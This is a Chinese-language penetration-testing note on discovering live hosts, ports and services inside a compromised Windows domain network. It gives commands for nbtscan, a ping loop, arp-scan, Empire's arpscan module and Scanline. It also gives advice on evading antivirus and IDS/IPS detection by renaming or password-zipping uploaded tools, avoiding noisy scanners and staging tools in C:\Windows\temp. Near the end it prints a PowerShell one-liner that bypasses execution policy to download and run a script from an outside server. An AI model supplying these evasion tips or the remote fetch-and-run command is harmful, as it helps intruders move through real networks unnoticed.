域渗透笔记-信息收集（二）

简述:

在做内网横向前，我们需要先知道内网有哪些主机，他们是什么系统，开放了哪些端口，运行了什么服务，这都决定了我们下一阶段的行动方向。

 

关键字：存活、端口、服务

 

内网存活探测

 

1.Nbtscan

命令：

nbtscan.exe IP段

扫描结果说明：

SHARING:该主机有运行文件和打印共享服务，但不一定有内容共享

IIS：该主机可能安装了IIS服务器

NOTES：该主机可能安装了IBM的Lotus Notes-电子邮件客户端

DC：该主机可能是域控制器

U=USER：该主机可能存在USER用户

？：没有识别处该主机NETBIOS资源，可以使用-f参数再次进行扫描

有时候上传工具时为了避免立马被杀，可以选择对文件名进行修改、加密码压缩，避免因文件名特征太明显被杀。

注意事项：

(1)在内网应尽量避免使用NAMP这种暴力类的工具 ，容易报警，也不要使用图形化工具。

(2)在内网探测时推荐使用基于netbios协议的扫描器，因为他扫描时的探测方式会被ids/ips当做正常的连接

(3)nbtscan可以很好的规避ids\ips的查杀。

(4)建议使用系统自带的工具，例如，WIN7以上系统，建议使用PS（powershell）脚本，WIN7以下的系统建议使用VBS脚本。

 

探测小技巧：

（1）对不同时间段进行探测，排除个人PC的干扰。

（2）一般推荐将要用的工具放到C:\Windows\temp文件夹下。

（3）扫描结果右边的内容对应上面“扫描结果说明”

 

2.icmp

使用命令：

for /L %a in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%a | findstr "TTL"

注:

（1）用的时候需要修改IP段。

（2）命令中的‘a’是用来控制循环的，只要前后两个'a'一致即可，不一定要用'a'。

（3）ping不通只代表icmp协议不同，不代表其他协议不通，不能轻易就认为不存活。

 

使用icmp.vbs

使用icmp.vbs进行探测，使用时需要修改脚本中的IP地址

如果在命令后门加  /b  则会在后台运行

默认会创建一个记录结果的文件：

C:\Windows\Temp\Result.txt

 

3.arp（非系统自带）

arp-scan.exe

命令：

arp-scan.exe -t 192.168.10.0/24

 

powershell脚本

例如：Invoke-ARPScan.ps1

用的时候命令中的IP自行修改

powershell.exe -exec bypass -Command "& {Import-Module C:\Windows\temp\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.10.0/24}" >>C:\Windows\temp\log.txt

命令运行结束会在C:\Windows\temp\log.txt生成结果文件，可根据需要进行修改

 

Empire中的arpscan模块

使用这个工具需要现在该工具上有一个agent(会话shell，类似metepreter)

然后执行：

use powershell/situational_awareness/network/arpscanset Range 192.168.10.0/24set Agent WEDYPZCR(前面执行agents时列出的会话Name)execute

(Valid resutls列出的就是存活的)

 

4.Scanline

scanline -h -t 22,80-89,110,389,445,3389,1099,1433,2049,6379,7001,8080,1521,3306,5432 -u 53,161,137,139  -O C:\Windows\temp\log.txt  -p 192.168.10.1-254  /b-t  tcp-u  udp/b  后台运行

 

5.arp(系统自带)

通过系统自带的arp命令可以用来发现部分存活主机：

arp -a  查看进行过通信的内网主机这个命令windows、linux通用

 

工具上传（下载到目标机）

前面说的点有些需要自行上传工具的，可以自行根据实际情况选择下载方式，例如：

FTP、WEB、直接复制代码进行编译运行等。这里提供一个powershell的方式：

从远程服务器上下载ps脚本而后进行运行。

powershell -nop -exec bypass -c "IEX (New-Object New.WebClient).DownloadString('http://119.XX.XXX.67/Invoke-ARPScan.ps1');Invoke-ARPScan -CIDR 192.168.10.0/24" >> C:\Windows\temp\log.txt

注：

（1）命令中文件下载、保存路径根据实际进行修改

（2）bypass这个方法是微软提供的用来绕过执行策略的一种方式。当指定该标志后，即视为什么都不做，什么警告也不提示。

 

欢迎分享转发。

喜欢的话动动手指点个“在看”吧~

 

 

 

​